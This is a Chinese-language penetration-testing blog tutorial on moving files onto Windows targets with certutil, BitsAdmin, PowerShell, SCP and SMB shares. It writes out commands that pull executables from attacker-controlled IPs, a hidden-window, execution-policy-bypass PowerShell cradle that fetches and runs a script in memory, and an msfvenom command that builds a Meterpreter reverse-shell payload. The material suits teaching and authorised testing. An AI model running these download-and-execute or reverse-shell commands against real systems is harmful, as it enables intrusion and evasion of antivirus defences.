滲透測試常用文件傳輸方法-Windows篇(如何向Windows服務器中上傳文件?) (゚益゚メ) 滲透測試
文章目錄
文件傳輸
文件傳輸在滲透測試中主要用於將攻擊載荷上傳到目標主機或者獲取目標資產使用。
下面我說的下載統一為攻擊機向目標機傳輸文件,上傳則相反!
下面很多下載我都是在Linux上開啟的下載服務,可以看我在Linux篇寫的攻擊機掛載文件: xunmi.blog.csdn.net/article/det…
注意: 下述所有命令,如果你是在powershell中執行的,則無需在開頭寫powershell,如果是在cmd中執行的,這需要寫powershell。下述所有命令沒有特殊說明的情況下,我都是使用powershell做示例!(看命令行開頭有PS這代表是powershell!)
certutil
certutil是Windows內置的一個證書服務的一部分,其中有可以被我們利用的下載模塊。
- 優勢: 方便易用,支持大多數文件下載
- 缺點: 不支持文件上傳,而且下載文件后留有緩存
# 顯示或刪除 URL 緩存項目 -URLCache # 分離嵌入的抽象語法標記1(ASN.1)元素,並保存到文件 -URLCache -split # 強制執行 -URLCache -f # 強制執行將目標文件保存到指定地址 certutil.exe -urlcache -split -f 目標文件 保存地址 # 如 certutil -urlcache -split -f http://43.128.11.31:8000/6666.exe C:\臨時\下載文件.exe 復制代碼
上述在介紹命令的時候也能看出這種下載方式是利用了cetutil的緩存機制,所以會留下緩存的文件。默認緩存路徑%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
# 刪除緩存 certutil.exe -urlcache -split -f 目標文件 delete # 如 certutil.exe -urlcache -split -f http://43.128.11.31:8000/6666.exe delete 復制代碼BitsAdmin
- 優勢: 專門用來傳輸文件的工具,傳輸功能齊全。
- 缺點: 下載目標必須是真實的HTTP協議,如阿帕奇,不支持Python之類的腳本開啟的臨時服務。
# 下載文件 bitsadmin /transfer 任務名 下載地址 保存地址(最后需要加上保存文件的名字) # 如 bitsadmin /transfer 下載任務 http://43.128.11.131/1.txt C:\Users\xunmi\Desktop\網安\下載文件.txt 復制代碼
Powershell
- 優勢: 簡單易用,適用性廣。(並且支持Python之類的腳本語言開啟的簡易web服務!)
- 缺點: 被大多數殺軟判定為安全重災區,會受到很多殺軟的’特殊關照’!
- 方法一: 調用內置對象
system.net.webclient(提供常用的方法來發送和接收由URI標識的一個資源中的數據)
# 最基礎的文件下載 ## 創建一個新的對象 $p = new-object system.net.webclient ## 調用此實例來下載目標文件 $p.downloadfile("下載地址","保存地址") # 合並版 ## powershell中執行 $p=new-object system.net.webclient;$p.downloadfile('下載地址','保存地址') ## cmd中執行 powershell -c "$p=new-object system.net.webclient;$p.downloadfile('下載地址','保存地址')" powershell -c "$p=new-object system.net.webclient;$p.downloadfile('http://43.128.11.131:8000/6666.exe','C:\Users\xunmi\Desktop\網安\6666.exe')" # 簡寫版 (new-object system.net.webclient).downloadfile("下載地址","保存地址") (new-object system.net.webclient).downloadfile('http://43.128.11.131:8000/6666.exe','C:\Users\xunmi\Desktop\網安\6666.exe') 復制代碼PS: 保存地址盡量寫絕對路徑!
- 方法二:調用
Invoke-WebRequest方法,此方法有幾個別名,iwr,wget,curl,使用此別名和此方法名效果是完全相同的!如果你看了我之前寫的linux篇或本身對Linux文件傳輸就有所了解應該會對這幾個別名感覺非常熟悉!
# 使用方法 Invoke-WebRequest -uri "下載地址" -OutFile "保存地址" # 使用別名效果相同,並且-uri可以省略 wget "下載地址" -OutFile "保存地址" # 比如 wget 'http://43.128.11.131:8000/6666.exe' -OutFile 'C:\Users\xunmi\Desktop\網安\6666.exe' 復制代碼- 方法三: 加文件加載如內存,無文件落地,這里需要調用到內置對象
Net.WebClient
# -windowstyle 窗口模式(這里我選擇隱藏窗口) # -exec 執行策略,可以簡寫為-ep(默認策略無法在內存中執行,這里選擇bypass) # IEX 加載到內存,無文件落地 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('下載地址');腳本名"; # http://192.168.1.200:8000/shell.ps1 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:8000/shell.ps1');shell.ps1"; 復制代碼# 使用msf生成一個測試目標 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=6666 -f psh-reflection -o shell.ps1 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:8000/shell.ps1');shell.ps1"; 復制代碼SCP
scp有點像ssh的連接語法,也是一個非交互的文件傳輸方法,同樣也會自動調用ssh的免密認證。並且這種方法不僅可以下載文件,還可以下載文件夾還有上傳文件和文件夾操作!
# 下載文件 scp 用戶名@服務器地址:目標文件 保存地址 # 如 scp root@43.128.11.131:/root/滲透測試/1.txt F:\下載\臨時\1.txt # 下載文件夾(需要-r參數) scp -r 用戶名@服務器地址:目標文件夾 保存地址 # 如 scp -r root@43.128.11.131:/root/滲透測試/掛載腳本 F:\下載\臨時\ # 上傳文件 scp 上傳文件 用戶名@服務器地址:目標目錄 # 如 scp F:\下載\臨時\火星船票.png root@43.128.11.131:/root/滲透測試/上傳的圖片.png # 同樣如果想上傳文件夾,只需要添加-r參數即可 scp -r F:\下載\臨時 root@43.128.11.131:/root/滲透測試 復制代碼
Windows文件共享
文件共享在內網橫向滲透中會比較常用。
# 查看當前本機可共享的文件夾 net share # 如下圖,可以看出默認情況下,我們幾個磁盤都會被共享,對方如果有我們主機的賬戶的話是可以直接遠程掛載的! 復制代碼
# 掛載方式 net use 本地盤符 \\目標IP地址\目標共享名 # 或 net use 本地盤符 \\目標IP地址\目標共享名 "目標用戶密碼" /user:目標用戶名 net use Y: \\192.168.1.251\Users "8ge8+1ge1" /user:xunmi # 但一般默認共享的目錄只有administrator及以上權限用戶才有資格連接 復制代碼
